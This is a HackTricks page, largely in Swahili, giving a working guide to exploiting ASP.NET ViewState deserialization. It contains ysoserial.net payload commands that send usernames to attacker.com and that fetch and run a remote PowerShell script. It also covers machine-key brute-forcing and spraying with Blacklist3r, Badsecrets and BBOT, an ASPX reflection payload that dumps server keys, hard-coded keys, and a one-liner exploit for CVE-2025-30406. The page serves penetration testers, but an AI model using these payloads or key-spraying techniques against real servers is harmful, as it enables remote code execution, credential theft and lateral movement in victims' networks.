Exploiting __VIEWSTATE without knowing the secrets

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

ViewState ni nini

ViewState hutumika kama mekanismo chaguo-msingi katika ASP.NET kudumisha data za ukurasa na controls kati ya kurasa za wavuti. Wakati wa ku-render HTML ya ukurasa, hali ya sasa ya ukurasa na thamani zinazotakiwa kuhifadhiwa wakati wa postback zinaserializiwa kuwa base64-encoded strings. Nyuzi hizi kisha huwekwa katika hidden ViewState fields.

Taarifa za ViewState zinaweza kuelezwa kwa sifa zifuatazo au mchanganyiko wake:

• Base64:
• Format hii inatumiwa wakati sifa zote mbili EnableViewStateMac na ViewStateEncryptionMode zimewekwa kuwa false.
• Base64 + MAC (Message Authentication Code) Enabled:
• Uwezeshaji wa MAC hufikiwa kwa kuweka attribute EnableViewStateMac kuwa true. Hii inatoa uthibitisho wa uadilifu kwa data za ViewState.
• Base64 + Encrypted:
• Encryption inatumika wakati attribute ViewStateEncryptionMode imewekwa kuwa true, ikihakikisha usiri wa data za ViewState.

Test Cases

Mchoro ni jedwali linaloonyesha usanidi tofauti wa ViewState katika ASP.NET kulingana na toleo la .NET framework. Hapa chini ni muhtasari wa yaliyomo:

1. Kwa toleo lolote la .NET, wakati MAC na Encryption zote zimezimwa, MachineKey haihitajiki, na kwa hivyo hakuna mbinu inayofaa ya kuibaini.
2. Kwa matoleo chini ya 4.5, ikiwa MAC imewezeshwa lakini Encryption haijawezeshwa, MachineKey inahitajika. Mbinu ya kutambua MachineKey inatajwa kama “Blacklist3r.”
3. Kwa matoleo chini ya 4.5, bila kujali kama MAC imewezeshwa au imezimwa, ikiwa Encryption imewezeshwa, MachineKey inahitajika. Kutambua MachineKey ni kazi inayotegemea “Blacklist3r - Future Development.”
4. Kwa matoleo 4.5 na zaidi, mchanganyiko wote wa MAC na Encryption (iwe zote mbili ni true, au moja ni true na nyingine ni false) unahitaji MachineKey. MachineKey inaweza kutambuliwa kwa kutumia “Blacklist3r.”

Kesi ya Jaribio: 1 – EnableViewStateMac=false and viewStateEncryptionMode=false

Inawezekana pia kuzima kabisa ViewStateMAC kwa kuweka registry key AspNetEnforceViewStateMac kuwa zero katika:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}

Kutambua Sifa za ViewState

Unaweza kujaribu kubaini ikiwa ViewState inalindwa na MAC kwa kukamata ombi linalojumuisha parameter hii kwa kutumia BurpSuite. Ikiwa MAC haitumiki kulinda parameter, unaweza kui-exploit kwa kutumia YSoSerial.Net

ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"

Test case 1.5 – Kama Test case 1 lakini cookie ya ViewState haitumwa na server

Waendelezaji wanaweza kuondoa ViewState ili isiwe sehemu ya HTTP Request (mtumiaji hatapokea cookie hii).
Mtu anaweza kudhani kwamba ikiwa ViewState haipo, utekelezaji wao uko salama dhidi ya udhaifu wowote unaoweza kutokea kutokana na ViewState deserialization.
Hata hivyo, sivyo. Ikiwa tutafanya add ViewState parameter kwenye request body na kutuma serialized payload yetu iliyotengenezwa kwa kutumia ysoserial, bado tutaweza kufanikisha code execution kama ilivyoonyeshwa katika Case 1.

Test Case: 2 – .Net < 4.5 and EnableViewStateMac=true & ViewStateEncryptionMode=false

Ili kuwezesha ViewState MAC kwa ukurasa maalum tunahitaji kufanya mabadiliko yafuatayo kwenye faili maalum la aspx:

<%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>

Tunaweza pia kufanya hivyo kwa programu overall kwa kuiweka kwenye faili web.config kama inavyoonyeshwa hapa chini:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="Off" />
<machineKey validation="SHA1" validationKey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" />
<pages enableViewStateMac="true" />
</system.web>
</configuration>

Kwa kuwa parameter imewalindwa kwa MAC wakati huu, ili kutekeleza shambulio kwa mafanikio tunahitaji kwanza ufunguo uliotumika.

Unaweza kujaribu kutumia Blacklist3r(AspDotNetWrapper.exe) kupata ufunguo uliotumika.

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"

--encrypteddata : __VIEWSTATE parameter value of the target application
--modifier : __VIWESTATEGENERATOR parameter value

Badsecrets ni zana nyingine inayoweza kutambua machineKeys zinazojulikana. Imeandikwa kwa Python, hivyo tofauti na Blacklist3r, hakuna utegemezi wa Windows. Kwa .NET viewstates, kuna utiliti “python blacklist3r”, ambayo ndiyo njia ya haraka zaidi ya kuitumia.

Inaweza kupewa viewstate na generator moja kwa moja:

pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE

Au, inaweza kuunganishwa moja kwa moja na URL lengwa na kujaribu kuchonga viewstate kutoka kwenye HTML:

pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx

Kutafuta viewstates zilizo hatarini kwa wingi, kwa kushirikiana na subdomain enumeration, moduli ya badsecrets BBOT inaweza kutumika:

bbot -f subdomain-enum -m badsecrets -t evil.corp

Kama una bahati na key imepatikana, unaweza kuendelea na attack ukitumia YSoSerial.Net:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

--generator = {__VIWESTATEGENERATOR parameter value}

Katika matukio ambapo parameter _VIEWSTATEGENERATOR haitumiwi na server hauhitaji kutoa parameter ya --generator lakini hizi:

--apppath="/" --path="/hello.aspx"

Kutumia tena thamani za <machineKey> kwa wingi

Ink Dragon (2025) ilionyesha jinsi ilivyo hatari wakati wasimamizi wananakili sample <machineKey> blocks zilizochapishwa katika Microsoft docs, StackOverflow answers au vendor blogs. Mara lengo moja leaks au linatumia tena keys hizo katika farm, kila ukurasa mwingine wa ASP.NET unaoaminia ViewState unaweza ku-hijacked remotely bila hitilafu nyingine yoyote.

1. Jenga candidate wordlist kwa jozi za leaked validationKey/decryptionKey (mfano: scrape public repos, Microsoft blog posts, au keys zilizopatikana kutoka kwa host moja katika farm) na ziweke katika Blacklist3r/Badsecrets:

AspDotNetWrapper.exe --keypath reused_machinekeys.txt --url https://target/_layouts/15/ToolPane.aspx --decrypt --purpose=viewstate --modifier=<VIEWSTATEGENERATOR>
# or let Badsecrets spray the list
bbot -f subdomain-enum -m badsecrets --badsecrets-keylist reused_machinekeys.txt -t sharepoint.customer.tld

Tooling inasaini tena na tena benign __VIEWSTATE blob kwa kila candidate key hadi server itakubali MAC, kuthibitisha key ni halali. 2. Forge the malicious ViewState mara jozi ya key inapo patikana. Ikiwa encryption imezimwa unahitaji tu validationKey. Ikiwa encryption imewezeshwa, jumuisha decryptionKey inayolingana ili payload idumu kwenye decrypt → deserialize path:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -c iwr http://x.x.x.x/a.ps1|iex" \
--validationkey "$VALIDATION" --decryptionkey "$DECRYPTION" --validationalg="SHA1" --generator=<VIEWSTATEGENERATOR>

Operators mara nyingi huingiza disk-resident launchers (mfano: PrintNotifyPotato, ShadowPad loaders, etc.) moja kwa moja ndani ya payload kwa sababu inatekelezwa kama IIS worker (w3wp.exe). 3. Pivot laterally kwa kutumia tena <machineKey> ile ile across sibling SharePoint/IIS nodes. Mara server moja inapotelezwa unaweza ku-replay key ili kugonga server nyingine zote ambazo hazijazungusha configuration yao.

Test Case: 3 – .Net < 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true

Katika hili haijulikani kama parameter imehifadhiwa na MAC. Kwa hiyo, thamani inawezekana imefichwa na utahitaji Machine Key ili encrypt payload yako ili ku-exploit udhaifu.

Katika kesi hii Blacklist3r moduli iko katika hatua ya maendeleo…

Kabla ya .NET 4.5, ASP.NET inaweza kubali parameter ya __VIEWSTATE isiyosimbwa kutoka kwa watumiaji hata kama ViewStateEncryptionMode imewekwa kuwa Always. ASP.NET inacheki tu uwepo wa parameter ya __VIEWSTATEENCRYPTED katika ombi. Ikiwa mtu ataondoa parameter hii, na kutuma payload isiyosimbwa, bado itashughulikiwa.

Kwa hivyo ikiwa attackers watapata njia ya kupata Machinekey kupitia vuln nyingine kama file traversal, YSoSerial.Net command iliyotumiwa katika Case 2, inaweza kutumika kufanya RCE kwa kutumia ViewState deserialization vulnerability.

• Ondoa parameter __VIEWSTATEENCRYPTED kutoka kwenye ombi ili ku-exploit ViewState deserialization vulnerability, vinginevyo itarudisha kosa la uthibitisho wa Viewstate MAC na exploit itashindwa.

Test Case: 4 – .Net >= 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true/false except both attribute to false

Tunaweza kulazimisha matumizi ya ASP.NET framework kwa kubainisha parameter ifuatayo ndani ya faili web.config kama inavyoonyeshwa hapa chini.

<httpRuntime targetFramework="4.5" />

Vinginevyo, hili linaweza kufanywa kwa kubainisha chaguo hapa chini ndani ya parameter ya machineKey ya faili ya web.config.

compatibilityMode="Framework45"

Kama ilivyo hapo awali, thamani imefichwa kwa usimbuaji. Hivyo, ili kutuma valid payload the attacker need the key.

Unaweza kujaribu kutumia Blacklist3r(AspDotNetWrapper.exe) kupata ufunguo unaotumika:

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate  --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"

--encrypteddata = {__VIEWSTATE parameter value}
--IISDirPath = {Directory path of website in IIS}
--TargetPagePath = {Target page path in application}

Kwa maelezo ya undani zaidi kuhusu IISDirPath na TargetPagePath refer here

Au, pamoja na Badsecrets (kwa thamani ya generator):

cd badsecrets
python examples/blacklist3r.py --viewstate JLFYOOegbdXmPjQou22oT2IxUwCAzSA9EAxD6+305e/4MQG7G1v5GI3wL7D94W2OGpVGrI2LCqEwDoS/8JkE0rR4ak0= --generator B2774415

Mara tu Machine key halali itakapobainika, hatua inayofuata ni kuunda serialized payload kwa kutumia YSoSerial.Net

ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

If you have the value of __VIEWSTATEGENERATOR you can try to use the --generator parameter with that value and omit the parameters --path and --apppath

Udhuru wa ViewState deserialization ukifanikiwa kusababisha ombi la out-of-band kwenda kwenye server inayodhibitiwa na mshambuliaji, ambalo linajumuisha jina la mtumiaji. Aina hii ya exploit inaonyeshwa katika proof of concept (PoC) inayopatikana kupitia rasilimali iliyoitwa “Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET”. Kwa maelezo zaidi juu ya jinsi mchakato wa exploitation unavyofanya kazi na jinsi ya kutumia zana kama Blacklist3r kutambua MachineKey, unaweza kupitia PoC of Successful Exploitation.

Test Case 6 – ViewStateUserKeys inatumika

The ViewStateUserKey property can be used to defend against a CSRF attack. If such a key has been defined in the application and we try to generate the ViewState payload with the methods discussed till now, the payload won’t be processed by the application.
Unahitaji kutumia parameter moja zaidi ili kuunda payload ipasavyo:

--viewstateuserkey="randomstringdefinedintheserver"

Matokeo ya Exploitation Iliyofanikiwa

Kwa kesi zote za mtihani, ikiwa ViewState YSoSerial.Net payload inafanya kazi kwa mafanikio basi server itajibu na “500 Internal server error” ikiwa na maudhui ya majibu “The state information is invalid for this page and might be corrupted” na tunapata OOB request.

Angalia taarifa zaidi hapa

Dumping ASP.NET Machine Keys via Reflection (SharPyShell/SharePoint ToolShell)

Washambuliaji walio na uwezo wa upload or execute arbitrary ASPX code ndani ya root ya wavuti lengwa wanaweza kupata kwa moja secret keys zinazolinda __VIEWSTATE badala ya kufanya bruteforcing.

A minimal payload that leaks the keys leverages internal .NET classes through reflection:

<%@ Import Namespace="System.Web.Configuration" %>
<%@ Import Namespace="System.Reflection" %>
<script runat="server">
public void Page_Load(object sender, EventArgs e)
{
var asm = Assembly.Load("System.Web");
var sect = asm.GetType("System.Web.Configuration.MachineKeySection");
var m = sect.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);
var cfg = (MachineKeySection)m.Invoke(null, null);
// Output: ValidationKey|DecryptionKey|Algorithm|CompatibilityMode
Response.Write($"{cfg.ValidationKey}|{cfg.DecryptionKey}|{cfg.Decryption}|{cfg.CompatibilityMode}");
}
</script>

Kuomba ukurasa kunachapisha ValidationKey, DecryptionKey, algoritimu ya usimbaji na modi ya ulinganishaji ya ASP.NET. Thamani hizi sasa zinaweza kulishwa moja kwa moja kwenye ysoserial.net kuunda gadget halali na iliyosainiwa ya __VIEWSTATE:

ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"whoami\"" \
--generator=<VIEWSTATE_GENERATOR> \
--validationkey=<VALIDATION_KEY> --validationalg=<VALIDATION_ALG> \
--decryptionkey=<DECRYPTION_KEY> --decryptionalg=<DECRYPTION_ALG> \
--islegacy --minify
curl "http://victim/page.aspx?__VIEWSTATE=<PAYLOAD>"

Hii key-exfiltration primitive ilitumiwa kwa wingi dhidi ya on-prem SharePoint servers mnamo 2025 (“ToolShell” – CVE-2025-53770/53771), lakini inafaa kwa aplikesheni yoyote ya ASP.NET ambapo mshambuliaji anaweza kuendesha server-side code.

2024-2025 Mifano ya Utekelezaji wa Uhalisia na Hard-coded Machine Keys

Microsoft “publicly disclosed machine keys” wimbi (Dec 2024 – Feb 2025)

Microsoft Threat Intelligence iliripoti matumizi ya wingi ya tovuti za ASP.NET ambapo machineKey ilikuwa tayari leaked kwenye vyanzo vya umma (GitHub gists, blog posts, paste sites). Wadukuzi waliorodhesha hizi keys na kuunda __VIEWSTATE gadgets halali kwa kutumia ysoserial.net 1.41 --minify na --islegacy flags ili kuepuka vikwazo vya urefu vya WAF:

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" \
--validationkey=<LEAKED_VALIDATION_KEY> --validationalg=SHA1 \
--decryptionkey=<LEAKED_DECRYPTION_KEY> --decryptionalg=AES \
--generator=<VIEWSTATEGEN> --minify

Malengo yanayorudia kutumia funguo za static sawa katika farms hubaki hatarini kwa muda usioyokoma; mara zinapobadilisha kwenda kwenye AutoGenerate values mbinu ya spray inakoma, kwa hivyo panga vipaumbele kwa legacy deployments ambazo bado zinaonyesha hard-coded material.

CVE-2025-30406 – Gladinet CentreStack / Triofox hard-coded keys

Kudelski Security iligundua kuwa matoleo kadhaa ya CentreStack / Triofox yaliwasilishwa na machineKey zilezile, zikiruhusu unauthenticated remote code execution kupitia ViewState forgery (CVE-2025-30406).

One-liner exploit:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \
--validationkey=ACC97055B2A494507D7D7C92DC1C854E8EA7BF4C \
--validationalg=SHA1 \
--decryptionkey=1FB1DEBB8B3B492390B2ABC63E6D1B53DC9CA2D7 \
--decryptionalg=AES --generator=24D41AAB --minify \
| curl -d "__VIEWSTATE=$(cat -)" http://victim/portal/loginpage.aspx

Imerekebishwa katika CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – sasisha au badilisha funguo mara moja.

Marejeleo

• Exploiting ViewState deserialization using Blacklist3r and YSoSerial.NET
• Deep dive into .NET ViewState deserialization and its exploitation
• Exploiting deserialisation in ASP.NET via ViewState (Soroush Dalili, 2019)
• Introducing badsecrets – fast machineKey discovery
• SharePoint “ToolShell” exploitation chain (Eye Security, 2025)
• Microsoft Security – Code injection attacks abusing publicly disclosed ASP.NET machine keys (Feb 6 2025)
• Kudelski Security advisory – Gladinet CentreStack / Triofox RCE CVE-2025-30406 (Apr 16 2025)
• https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/
• https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817
• https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
• https://blog.blacklanternsecurity.com/p/introducing-badsecrets
• SharePoint “ToolShell” exploitation chain (Eye Security, 2025)
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.